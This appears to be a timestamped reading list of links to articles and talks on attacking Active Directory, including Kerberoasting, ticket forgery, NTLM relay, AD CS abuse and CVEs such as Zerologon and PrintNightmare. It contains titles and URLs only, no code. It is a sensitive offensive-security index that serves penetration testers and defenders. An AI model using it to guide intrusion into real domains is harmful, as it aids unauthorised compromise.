* [Exploiting PrivExchange - April 11, 2019 - @chryzsh ](https://chryzsh.github.io/exploiting-privexchange/ )
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019 ](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/ )
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences ](https://adsecurity.org/?p=2288 )
2020-08-09 17:25:03 +00:00
* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf ](https://adsecurity.org/?p=2011 )
2019-07-25 12:08:32 +00:00
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments ](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments )
2018-08-12 21:30:22 +00:00
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html )
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html )
2019-07-25 12:08:32 +00:00
* [Golden ticket - Pentestlab ](https://pentestlab.blog/2018/04/09/golden-ticket/ )
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff ](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/ )
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018 ](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 )
* [Invoke-Kerberoast - Powersploit Read the docs ](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ )
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller ](https://room362.com/post/2016/kerberoast-pt1/ )
* [Passing the hash with native RDP client (mstsc.exe) ](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/ )
2018-08-12 21:30:22 +00:00
* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView) ](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/ )
* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView ](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/ )
* [Pen Testing Active Directory Environments - Part III: Chasing Power Users ](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/ )
* [Pen Testing Active Directory Environments - Part IV: Graph Fun ](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/ )
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs ](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/ )
* [Pen Testing Active Directory Environments - Part VI: The Final Case ](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ )
2019-07-25 12:08:32 +00:00
* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec ](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/ )
* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec ](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ )
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman ](https://0metasecurity.com/post-oscp-part-2/ )
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith ](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/ )
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave ](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html )
* [Roasting AS-REPs - January 17, 2017 - harmj0y ](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ )
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher ](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa )
* [Using bloodhound to map the user network - Hausec ](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/ )
* [WHAT’ S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN ](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/ )
2018-08-12 21:30:22 +00:00
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1 ](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/ )
* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5 ](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/ )
2019-07-24 12:10:58 +00:00
* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami ](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html )
2019-07-26 12:24:58 +00:00
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
2019-08-18 20:24:48 +00:00
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y ](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/ )
2019-10-15 16:18:07 +00:00
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ )
2019-10-20 11:25:06 +00:00
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf ](https://adsecurity.org/?p=3592 )
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
2019-10-20 20:09:36 +00:00
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon ](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf )
2019-10-21 21:00:27 +00:00
* [Playing with Relayed Credentials - June 27, 2018 ](https://www.secureauth.com/blog/playing-relayed-credentials )
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema ](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/ )
2019-11-04 20:43:44 +00:00
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019 ](https://blog.preempt.com/drop-the-mic )
2019-11-07 22:21:00 +00:00
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous ](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/ )
2019-12-30 18:55:47 +00:00
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX ](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/ )
2020-01-05 15:28:00 +00:00
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema ](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/ )
2020-01-05 21:11:28 +00:00
* [A Red Teamer’ s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0 ](https://wald0.com/?p=179 )
2020-04-17 14:34:51 +00:00
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf ](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0 )
2020-05-03 14:28:17 +00:00
* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10 ](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61 )
2020-05-10 21:16:29 +00:00
* [Active-Directory-Exploitation-Cheat-Sheet - @buftas ](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation )
* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019 ](https://rastamouse.me/2019/01/gpo-abuse-part-1/ )
* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019 ](https://rastamouse.me/2019/01/gpo-abuse-part-2/ )
2020-06-18 09:55:48 +00:00
* [Abusing GPO Permissions - harmj0y - March 17, 2016 ](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ )
2020-08-17 13:00:04 +00:00
* [How To Attack Kerberos 101 - m0chan - July 31, 2019 ](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html )
2020-08-17 13:15:33 +00:00
* [ACE to RCE - @JustinPerdok - July 24, 2020 ](https://sensepost.com/blog/2020/ace-to-rce/ )
2020-09-18 19:21:55 +00:00
* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020 ](https://www.secura.com/pathtoimg.php?id=2055 )
2020-10-02 04:39:09 +00:00
* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs ](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces )
2020-12-18 21:38:30 +00:00
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020 ](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/ )
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020 ](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/ )
* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory ](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory )
2021-02-26 13:14:10 +00:00
* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019 ](https://pentestmag.com/gpo-abuse-you-cant-see-me/ )
2021-03-24 21:26:23 +00:00
* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017 ](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ )
2021-04-10 15:58:05 +00:00
* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018 ](https://www.cybereason.com/blog/dcom-lateral-movement-techniques )
2021-06-24 13:26:05 +00:00
* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell ](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html )
* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev ](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ )
* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17 ](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab#Previous%20Work )
2021-07-12 18:45:16 +00:00
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021 ](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html )
2021-08-10 21:00:19 +00:00
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29 ](https://zer1t0.gitlab.io/posts/attacking_ad/ )
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021 ](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/ )
2021-08-22 21:03:02 +00:00
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021 ](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/ )
2021-08-25 20:14:44 +00:00
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema ](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/ )
* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_ ](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf )
2021-09-01 12:10:53 +00:00
* [Certified Pre-Owned - Will Schroeder - Jun 17 2021 ](https://posts.specterops.io/certified-pre-owned-d95910965cd2 )
* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021 ](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/ )
2021-09-30 20:17:20 +00:00
* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021 ](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb )